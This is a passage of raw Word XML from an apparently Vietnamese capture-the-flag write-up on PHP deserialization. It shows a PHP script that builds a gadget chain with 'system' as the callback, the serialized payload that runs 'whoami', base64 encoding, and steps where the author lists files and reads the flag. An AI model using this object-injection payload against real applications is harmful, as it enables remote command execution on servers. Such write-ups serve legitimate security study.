          </w:p>
          <w:p w14:paraId="1915F4FE" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    $exploit-&gt;callback = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"system"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A646E57" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="79E9F70A" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    $iceCream = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> IceCream();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FB72928" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    $iceCream-&gt;flavors = $exploit;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B29402" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="6DE4FE92" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    $spaghetti = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> Spaghetti();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05070BD2" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    $spaghetti-&gt;sauce = $iceCream;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A5D369A" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="65049E71" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    $pizza = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>new</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> Pizza();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D3F2F7C" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    $pizza-&gt;size = $spaghetti;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C0DB176" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674"/>
          <w:p w14:paraId="345E012A" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>echo</w:t>
            </w:r>
            <w:r w:rsidRPr="00E04674">
              <w:t xml:space="preserve"> serialize($pizza);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="155F877F" w14:textId="77777777" w:rsidR="00E04674" w:rsidRPr="00E04674" w:rsidRDefault="00E04674" w:rsidP="00E04674">
            <w:r w:rsidRPr="00E04674">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CC1B5AF" w14:textId="77777777" w:rsidR="000C210B" w:rsidRDefault="000C210B" w:rsidP="00033063"/>
    <w:p w14:paraId="75F88244" w14:textId="77777777" w:rsidR="000C210B" w:rsidRDefault="000C210B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C930DE" w14:textId="1E63CE92" w:rsidR="00B31D18" w:rsidRDefault="006A379F" w:rsidP="00033063">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tạo 1 file php là abc1.php chứa payload </w:t>
      </w:r>
      <w:r w:rsidR="00B31D18">
        <w:t>để thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411CAC0C" w14:textId="3C4E66C4" w:rsidR="00E04674" w:rsidRDefault="00B31D18" w:rsidP="00033063">
      <w:r w:rsidRPr="00B31D18">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B9D5B0F" wp14:editId="6E0E793F">
            <wp:extent cx="5731510" cy="2789555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1709595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5088" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2789555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECF32AF" w14:textId="252BC46C" w:rsidR="006A379F" w:rsidRDefault="006A379F" w:rsidP="00033063">
      <w:r>
        <w:t>Thực hiện khởi chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FA5457" w14:textId="7048961C" w:rsidR="006A379F" w:rsidRDefault="006A379F" w:rsidP="00033063">
      <w:r w:rsidRPr="006A379F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB3A835" wp14:editId="3A83F699">
            <wp:extent cx="5731510" cy="1240790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="180234534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45341" name="Picture 1" descr="A computer screen shot of white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1240790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4BE364" w14:textId="39F49FBC" w:rsidR="001535F5" w:rsidRDefault="004955CF" w:rsidP="00033063">
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00DF6391">
        <w:t xml:space="preserve">ạng tuần tự hóa </w:t>
      </w:r>
      <w:r w:rsidR="00DF6391">
        <w:t>để gửi đi</w:t>
      </w:r>
      <w:r w:rsidR="006A379F">
        <w:t xml:space="preserve"> sau khi chạy file abc1.php</w:t>
      </w:r>
      <w:r w:rsidR="00DF6391">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188BC815" w14:textId="160F8EF4" w:rsidR="001535F5" w:rsidRPr="00DF6391" w:rsidRDefault="00281C91" w:rsidP="00281C91">
      <w:r w:rsidRPr="00281C91">
        <w:t>O:5:"Pizza":3:{s:5:"price";N;s:6:"cheese";N;s:4:"size";O:9:"Spaghetti":3:{s:5:"sauce";O:8:"IceCream":2:{s:7:"flavors";O:21:"\Helpers\ArrayHelpers":4:{i:0;i:0;i:1;a:1:{i:0;s:</w:t>
      </w:r>
      <w:r w:rsidRPr="00281C91">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00281C91">
        <w:t>:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00281C91">
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="00281C91">
        <w:t>";}i:2;a:1:{s:8:"callback";s:6:"system";}i:3;N;}s:7:"topping";N;}s:7:"noodles";N;s:7:"portion";N;}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1899B4A3" w14:textId="1713436F" w:rsidR="001E04A9" w:rsidRPr="00DF6391" w:rsidRDefault="00D31884" w:rsidP="00281C91">
      <w:r>
        <w:t>Mã hóa base64:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115247D6" w14:textId="2F049DAF" w:rsidR="001E04A9" w:rsidRDefault="001E04A9" w:rsidP="00281C91">
      <w:r w:rsidRPr="001E04A9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F221D89" wp14:editId="0CD07AAE">
            <wp:extent cx="5731510" cy="1173480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="27980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0596" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1173480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="624E8E49" w14:textId="77777777" w:rsidR="00D31884" w:rsidRDefault="00D31884" w:rsidP="00281C91"/>
    <w:p w14:paraId="1C720D42" w14:textId="77777777" w:rsidR="00D31884" w:rsidRDefault="00D31884" w:rsidP="00281C91"/>
    <w:p w14:paraId="758102A1" w14:textId="77777777" w:rsidR="00D31884" w:rsidRDefault="00D31884" w:rsidP="00281C91"/>
    <w:p w14:paraId="76C72576" w14:textId="77777777" w:rsidR="00D31884" w:rsidRDefault="00D31884" w:rsidP="00281C91"/>
    <w:p w14:paraId="7630C1ED" w14:textId="77777777" w:rsidR="000C210B" w:rsidRDefault="000C210B">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B4DE55" w14:textId="59AA52A1" w:rsidR="001007B2" w:rsidRPr="001007B2" w:rsidRDefault="001007B2" w:rsidP="00281C91">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sử dụng ls thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6802CD75" w14:textId="5FED77FC" w:rsidR="00604A14" w:rsidRDefault="00604A14" w:rsidP="00281C91">
      <w:r w:rsidRPr="00604A14">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3420FA1B" wp14:editId="200DAFA0">
            <wp:extent cx="5731510" cy="2120265"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11772428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2868" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2120265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F436BC4" w14:textId="61897E24" w:rsidR="001007B2" w:rsidRPr="001007B2" w:rsidRDefault="001007B2" w:rsidP="00281C91">
      <w:r>
        <w:t>Đọc flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C2621" w14:textId="11387748" w:rsidR="00604A14" w:rsidRPr="00891945" w:rsidRDefault="00604A14" w:rsidP="00281C91">
      <w:r w:rsidRPr="00604A14">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E44AD8B" wp14:editId="7603E968">
            <wp:extent cx="5731510" cy="2357755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1669531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31752" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2357755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00604A14" w:rsidRPr="0089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692"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="410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21BA"/>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F2637"/>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D286A"/>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80D04"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9CA9F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44C6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D96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203EB"/>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27C0D"/>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403F7"/>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D2B34"/>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328552">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1625574468">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="127629397">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="687105073">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="457265212">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="294455200">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="373241124">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1119299331">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1822307746">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="15508730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63"/>
    <w:rsid w:val="0002152D"/>
    <w:rsid w:val="00033063"/>
    <w:rsid w:val="000C210B"/>
    <w:rsid w:val="001007B2"/>
    <w:rsid w:val="0010724B"/>
    <w:rsid w:val="001535F5"/>
    <w:rsid w:val="001A663E"/>
    <w:rsid w:val="001D4DD8"/>
    <w:rsid w:val="001E04A9"/>
    <w:rsid w:val="00281C91"/>
    <w:rsid w:val="00291DB0"/>
    <w:rsid w:val="00292D91"/>
    <w:rsid w:val="002A76C6"/>
    <w:rsid w:val="002B5004"/>
    <w:rsid w:val="002B7B29"/>
    <w:rsid w:val="002C2F82"/>
    <w:rsid w:val="00370168"/>
    <w:rsid w:val="00370626"/>
    <w:rsid w:val="003E5C1F"/>
    <w:rsid w:val="00467B38"/>
    <w:rsid w:val="004713C4"/>
    <w:rsid w:val="00476625"/>
    <w:rsid w:val="004859AA"/>
    <w:rsid w:val="004955CF"/>
    <w:rsid w:val="004C708D"/>
    <w:rsid w:val="004D1196"/>
    <w:rsid w:val="00540C8F"/>
    <w:rsid w:val="00591DBA"/>
    <w:rsid w:val="005B298E"/>
    <w:rsid w:val="00604A14"/>
    <w:rsid w:val="00644552"/>
    <w:rsid w:val="006A054B"/>
    <w:rsid w:val="006A379F"/>
    <w:rsid w:val="006E1E7E"/>
    <w:rsid w:val="00780F36"/>
    <w:rsid w:val="00891945"/>
    <w:rsid w:val="008A24CD"/>
    <w:rsid w:val="00947875"/>
    <w:rsid w:val="00977918"/>
    <w:rsid w:val="009840CC"/>
    <w:rsid w:val="009E37C3"/>
    <w:rsid w:val="00A27AC0"/>
    <w:rsid w:val="00A75E2F"/>
    <w:rsid w:val="00AA0652"/>
    <w:rsid w:val="00AC03C6"/>
    <w:rsid w:val="00AC1DB2"/>
    <w:rsid w:val="00AE4728"/>
    <w:rsid w:val="00B20C0C"/>
    <w:rsid w:val="00B31D18"/>
    <w:rsid w:val="00B649E9"/>
    <w:rsid w:val="00BB5837"/>
    <w:rsid w:val="00BF5132"/>
    <w:rsid w:val="00C247EE"/>
    <w:rsid w:val="00C42D40"/>
    <w:rsid w:val="00CC6588"/>
    <w:rsid w:val="00D31884"/>
    <w:rsid w:val="00D4089F"/>
    <w:rsid w:val="00D6480F"/>
    <w:rsid w:val="00D7561D"/>
    <w:rsid w:val="00DC627F"/>
    <w:rsid w:val="00DF6391"/>
    <w:rsid w:val="00DF74D9"/>
    <w:rsid w:val="00E04674"/>
    <w:rsid w:val="00E1636F"/>
    <w:rsid w:val="00EA3A1E"/>
    <w:rsid w:val="00F124E1"/>
    <w:rsid w:val="00F27409"/>
    <w:rsid w:val="00F40384"/>
    <w:rsid w:val="00FE30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F22B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6BEBA07E-EBDA-45E8-98A8-2EE830845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063"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00033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063"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00033063"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00033063"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00033063"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00033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063"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00033063"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A27A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5126</TotalTime>
  <Pages>13</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4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-30T15:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-06T13:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>